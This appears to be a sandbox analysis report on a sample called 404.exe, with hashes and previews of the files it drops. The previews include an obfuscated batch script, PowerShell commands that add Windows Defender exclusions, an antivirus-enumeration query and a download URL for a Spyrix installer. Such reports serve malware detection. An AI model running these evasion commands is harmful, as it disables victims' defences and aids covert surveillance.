                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):33441448
                                                                                                                                                                                                                                                          Entropy (8bit):7.998895110211762
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:786432:sEKNHXUy8paSpU5Nqs6QWYTYAUgde09g6i53G+wSl:NE3ULMSkQs6vXBPzRG+wg
                                                                                                                                                                                                                                                          MD5:0F335D8996D82DA30FE9286C671FA0CD
                                                                                                                                                                                                                                                          SHA1:FF64FF5AB0FF7C848809D5A82B2F6248B38F8FA5
                                                                                                                                                                                                                                                          SHA-256:10DED982BDF7EF7F33FD417C7D818D131B7C73CBF6E955BBE04FBA656B37FED7
                                                                                                                                                                                                                                                          SHA-512:12BD786BB93856D09826AB5D612FB3213CF8F6EC0C0240C27A0CDC510D56F4F4089636736D1A168463A6AC824E7B2ACE2611E6A5E8E0138C490B534662B54600
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W.....................p............... ....@..................................3....@......@.......................................O...........%...!...........................................................................................text...D........................... ..`.itext..d........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.................&...................rdata...............&..............@..@.rsrc....O.......P...(..............@..@....................................@..@........................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\404.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):13827
                                                                                                                                                                                                                                                          Entropy (8bit):5.401935483556868
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:1xngKcKf97GbP+RmQyL1CigUNdCdSXlyWe6:1l9a7AmpL1CigSdCdHWD
                                                                                                                                                                                                                                                          MD5:1DA9B9E6FFE924AB770E42584AEFA55C
                                                                                                                                                                                                                                                          SHA1:2BA7B0618652DDB292DFC14CD99BA7EC660EE37F
                                                                                                                                                                                                                                                          SHA-256:36D24113EEA3AB32ED96CCC074E6F9B31C3DA07A7FE6E7EB2193A455E9BCBDCC
                                                                                                                                                                                                                                                          SHA-512:218E1C2D1D027BEAF8B740BAA80CFD2FA19FEC242CD52ED3C6245B84FD00DE86E0AE77B476F2A6E82CC5BE1ECC9DCB3D559FA5E17727FE348D146078D2FB422D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:rem oihul2ehomy1rd8vri12ekjqpob8ecm2q8z5lxsf9stdhqkh4rw6s6ukhprr1y00ai3r9eed5651vjg8xigq0y04wwiu2dxzefismg5p032mfrr8d..rem tdsczcr2l94hh0mbz6ydo1qjpke2qnn6lpaqtqqscnkyi04svb90m8mbb028rzxmk7fabilm907q8jdwgiq6s6auxlwutr3arr71najet..@echo off..rem xeqtx00eh8ubfxt6reabtmcijcqblr1j2pfsnlh1f5ty31s0p2ywiwpqxervs0fmsh1..rem i786ha0ehoan3391a5tcl8irpykb8lpbwxal6g6..rem w5b002ey5k1tbp1ip0gscpl1ply0n1p1urqsxqhri8yn0qyprd1m..rem ckf20s24yexqv0jvh4rbjtfv8nnzg3qw21sjutdkjlr8983it5rrgld18a98ci8ipyo0i1k80kt4qrppys3w56drpwhtg4q2aip..reg query "HKU\S-1-5-19\Environment" >nul 2>&1..rem eypde5v2p2vea89gcj0idnu5q5e3erquo2ikwtrkmdy20g0gr66fjj4qakpa0dz9shuul2y5gd1igb..rem 388x7ceoviii91d70h7nlvsye5ltd8fsrq0xlh08o9em6003dufwmi0ip3bo4ag37ux8ae6ex8ugl1u2u4ip0simnnjxg3eb7hu..rem xmguyu6cb84l1yp1fg4nkgp2wungmpfdxuhu0u8hqwg2fxxbpsyp8bv3br20ntw2w4owd9ul0bd94r0b0vza4gjxxe3x1v0loqc53nu146mgk0muehs..rem wb10bwbvzka2xqyde3044jyl32veoz5upwtujz78tymrcm32s42fhk72y69ix8wivwc64wmyi8p44qtwkukhm01bu1jd8..if not %errorlevel% E
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):63
                                                                                                                                                                                                                                                          Entropy (8bit):4.431246742289477
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:N8fhmPMdUKLR3QVL4A:280dVtgVL4A
                                                                                                                                                                                                                                                          MD5:F8F417F775B9CC418AAA7AD2592324C1
                                                                                                                                                                                                                                                          SHA1:5F2E034B5A2B39B99BA0447FF8F3898D8D1E455D
                                                                                                                                                                                                                                                          SHA-256:4048A5F29484C100ED0F87BBE6D462939C050E7F011B9327AC66837F9F269AA6
                                                                                                                                                                                                                                                          SHA-512:79E2BF550C0A463E62AEDECE5AA5ABB11DE38AADF82B8BE118BCE49F2D0542DE23D656F7C311F3839845261A1754839F507C83C0AB4003F5508DE9E6A9CA01A3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11
                                                                                                                                                                                                                                                          Entropy (8bit):3.095795255000934
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:nWDn:nWD
                                                                                                                                                                                                                                                          MD5:285130BE63E78277DF11A9108B363925
                                                                                                                                                                                                                                                          SHA1:92DD2F701821CACA090F8058BD054E840FFF88CC
                                                                                                                                                                                                                                                          SHA-256:CFAEB467D2A24A24D97D2E8267E68E6D7C6C805D928DA760D6706AA20608FF5F
                                                                                                                                                                                                                                                          SHA-512:30755D1EC6BEF8B943100F321489ABBE09306817099623DE7916EC2F1CB9CCD191EBD8939352DAC6207AEB95963A30690452037C808FC165DB12C54099377BAC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:sfkstart ..
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):10
                                                                                                                                                                                                                                                          Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:n8xn:n8xn
                                                                                                                                                                                                                                                          MD5:CDB1A48B259C774953CF6BBE7400307F
                                                                                                                                                                                                                                                          SHA1:EA21684C2E98E04545F277AE0536ABB632C4327C
                                                                                                                                                                                                                                                          SHA-256:AC4A42FD557E8EF69E1D3BED829ED3A4AD955C40F96BE52315D72C269ADE781A
                                                                                                                                                                                                                                                          SHA-512:AA6132B49DC4A18909D975F92FA5D3D21B5B78FAA21913B17042F8AE71CE180280C6767159F3442CB0DFA62C6E42DB39C0F62AA54C2D5DB883BF4AC509F077F7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:sfkdone ..
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20
                                                                                                                                                                                                                                                          Entropy (8bit):3.6841837197791887
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:jBJiA74Sv:jBJiA7Vv
                                                                                                                                                                                                                                                          MD5:1249DB06A084E7BD91B25B5E80D734B4
                                                                                                                                                                                                                                                          SHA1:24913C0107782EDBD4860DB5BD44EFA70A7DFFB8
                                                                                                                                                                                                                                                          SHA-256:F81AA38FEF90A467D739EBC0B56A77F9D58057EE86EC69315A4015D5D7D396FA
                                                                                                                                                                                                                                                          SHA-512:0687A3615C1BA2D13314382C66F4B4E7217B52DE18A88EE27B45D28F776461C17FFEF7B5D85FF7DA3AB3AE14F3003D5802656FE6B3067D5057C9CDF4CAF46AC4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Windows Defender. ..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2560
                                                                                                                                                                                                                                                          Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                                                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):30376
                                                                                                                                                                                                                                                          Entropy (8bit):6.752744346977093
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:84NHPfHCs6GNOpiM+RFjFyzcN23AEoSXMYisio:8anvc+R9F4s8BoaMYi2
                                                                                                                                                                                                                                                          MD5:FD4743E2A51DD8E0D44F96EAE1853226
                                                                                                                                                                                                                                                          SHA1:646CEF384E949AAF61E6D0B243D8D84AB04E79B7
                                                                                                                                                                                                                                                          SHA-256:6535BA91FCCA7174C3974B19D9AB471F322C2BF49506EF03424517310080BE1B
                                                                                                                                                                                                                                                          SHA-512:4587C853871624414E957F083713EC62D50C46B7041F83FAA45DBF99B99B8399FC08D586D240E4BCCEE5EB0D09E1CDCB3FD013F07878ADF4DEFCC312712E468D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(....................L...*...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6144
                                                                                                                                                                                                                                                          Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):190
                                                                                                                                                                                                                                                          Entropy (8bit):4.909150566837293
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:QwZnVCYYYlCK3CbHFwK44NNMhNSjf4ugsrxjEaHiAuCWmqdHZlFABFWFTc5gIV:Qin3Nyb+rANyYDZRZummFZTc/V
                                                                                                                                                                                                                                                          MD5:46D85CB370F0F6D82914A869341C3C25
                                                                                                                                                                                                                                                          SHA1:956D44D64BC8331AE71F823A689EE4723F05BD54
                                                                                                                                                                                                                                                          SHA-256:23FD2BFC7E842DB9ACBE1A6D17CD3F0A714845D8AD5DAC2F126E9337D5DB3062
                                                                                                                                                                                                                                                          SHA-512:8BF8F3682CDE0F9D5C5802C06293F7BD071BA7D917D6F0D069BA34BD32E289E701F5E3021BC56227DD83EDC679A24FD6E4FF1F01F5F8411B5060AFF4B98E0F39
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:for /f "tokens=2 skip=1 delims==" %%i in ('"wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"') do if not %%i == "" echo %%i >> $ywr34c.tmp
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                          File Type:Windows Registry little-endian text (Win2K or above)
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):236
                                                                                                                                                                                                                                                          Entropy (8bit):3.6440699182134826
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:Qyk+SkWCiiCRroZ6IJlUAG+DZKHWn+SkUkDkqOEcRKw:Qy5hVZteAxDZaW+oVd3
                                                                                                                                                                                                                                                          MD5:0A7F333C72BA23F66948D2F7ACAF391E
                                                                                                                                                                                                                                                          SHA1:4E232F923162508127336631C7A734982795FC6F
                                                                                                                                                                                                                                                          SHA-256:C0E694FE96F168B2E1C2C6710E2DA625849F72A5260AC6F8AFD7B399B82C7026
                                                                                                                                                                                                                                                          SHA-512:E770D89B07783F9EDBD8F13D0D369CB3CF59BD666BDEA34276EB29FB8334A413A3F8159C9FD235CF9710937EE29838AA0665EC4CDC3B03204AE353B2EF1F2A91
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.O.F.T.W.A.R.E.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.P.a.t.h.s.].........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):142
                                                                                                                                                                                                                                                          Entropy (8bit):5.272165236388677
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:qia6pdgLxqrZfyM1KJA7yuLWH25PerbJSRE2J5xAIzIruYSM/H:DYLxiH18A7y/2e0i23fzIrnH
                                                                                                                                                                                                                                                          MD5:7359948BA17AF43E1DAE089AFD64D799
                                                                                                                                                                                                                                                          SHA1:0F35ED33DBA949839C7A225A8AE26C4765193D89
                                                                                                                                                                                                                                                          SHA-256:B3C022A5C191391155FCEF186FC4F35EE63AAD6DAC3860E72ED96D129241FA8C
                                                                                                                                                                                                                                                          SHA-512:CAB7637DBB65CB21237CD1AA922F1A9A9B4B476FF6A4DBB19ED0D36DF83B8AF7FEFF1DD3552A76F53D0F76651DC4220131729188EE2BE6EF8A54DCBEB1D31D3D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6966
                                                                                                                                                                                                                                                          Entropy (8bit):5.257630429556265
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:qJsQ8ADU7ROZX0dzdVry5xFdakbSYiq3G4wcwcOIqS:cCA5ZX4zdc5xFdakbSYiqWCjd
                                                                                                                                                                                                                                                          MD5:B83D443D2415453D2BD5BA3D64233AF0
                                                                                                                                                                                                                                                          SHA1:71D6B4D21842B2E2214CA09A82BD0301BD02796F
                                                                                                                                                                                                                                                          SHA-256:99D10B82F2BD584C5B6554514B1A747EC4DD9D8131D3B397244B3D36084D3CA1
                                                                                                                                                                                                                                                          SHA-512:C7D2A341F45CF5F858EF28341574E26D5F6C4D2F7FCB32F6A490E5F4F1DF6B6E1A7D1B82329162C46F2734EB446298741A3B82F6D961AC82C376FDF767FA0F22
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:BM6.......6...(...0...0...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j..U..O.z>.z>..P..V..m................................................................................................................c.{4..B..P..b.e.v.v.f..b..Q..C.{5..d................................................................................................K..D..`.y.................
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):917
                                                                                                                                                                                                                                                          Entropy (8bit):4.884815574267147
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nt0vG74xdl/ko+3bdhXUnt0oxdl/ko+3bdhXUn:nt2H+3EntTH+3En
                                                                                                                                                                                                                                                          MD5:6F2313763C1AD9F789FF3A343AD82AA1
                                                                                                                                                                                                                                                          SHA1:8FD79A4E381A7BC0ABBCCF8DE00BA25655CCB029
                                                                                                                                                                                                                                                          SHA-256:39EBF0A3E52E0D2EF8627338D9605F77A2D46B5B324B1E3CAB19CB6DDB43B4AB
                                                                                                                                                                                                                                                          SHA-512:CE53871C80BFC858678553EBA88AC3B79A565F4C3F401ECA9EEB2B37CF0F3FC3CB12ED300B0B31EBAB968E79A0D40785B6CF38F9D4D687677D8CA88E0A2049E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'.+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'.+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                          Entropy (8bit):4.886334581018452
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nt0vG74uEZE/ko+3bdhXUnt0ouEZE/ko+3bdhXUn:nt2ru+3EntTru+3En
                                                                                                                                                                                                                                                          MD5:F764E5A374CB4979A739316DC628B58D
                                                                                                                                                                                                                                                          SHA1:D7BEDF72C871CFC6CE0A2C261B812890926CAF33
                                                                                                                                                                                                                                                          SHA-256:169726FB096AB72851E5E9102B644DBEF534E4F9815B0B67807DC72CCD987380
                                                                                                                                                                                                                                                          SHA-512:D9110A7764933429275AC2DE0E1A3992BE8F263D286006DEDDE3D501C96B1D4934F20F235FF5C7A33E4C81BCFC0CE357F26A276721BCEFB76458D9796032CAE1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\* ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\* ....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1094
                                                                                                                                                                                                                                                          Entropy (8bit):5.214913894492431
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:i+yuEPX+yxdhl+yuEZaX+yxd0YQWl+yxd0YWl+yxd0YDzSl+yuEZ0YQt+yuEZ0Yx:tyrGyRgyrYOyVQWgyVWgyVDzSgyrTQ4Q
                                                                                                                                                                                                                                                          MD5:B5C0E22E10D0BB5B15B14874B2F42EE4
                                                                                                                                                                                                                                                          SHA1:C3F5F239B3948FB6A05B903217AE3502AFE10BB1
                                                                                                                                                                                                                                                          SHA-256:4BB48E85A3E7ACFBD97B42191DECFE4C10A5B89910413A3944B537B3154D7490
                                                                                                                                                                                                                                                          SHA-512:5D325FCF211ABAE2D125CDDE327EAB88289FE8E79778201E311062E9E99D8D670678173968DA7D6E737D8AEB383C3B0EA82AE2A019D55F7ED63D37A7D9DD874F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:powershell.exe add-mpPreference -ExclusionProcess '404.*'..powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\' > psout..powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*' > psout_p..powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe' > sout..powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe' > spsout..powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe' > spmmout..powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe' > sout_p..powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe' > spsout_p..powershell.exe add-mpPreference -ExclusionProcess
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                          Entropy (8bit):4.910532060752715
                                                                                                                                                                                                                                                          Encrypted:false
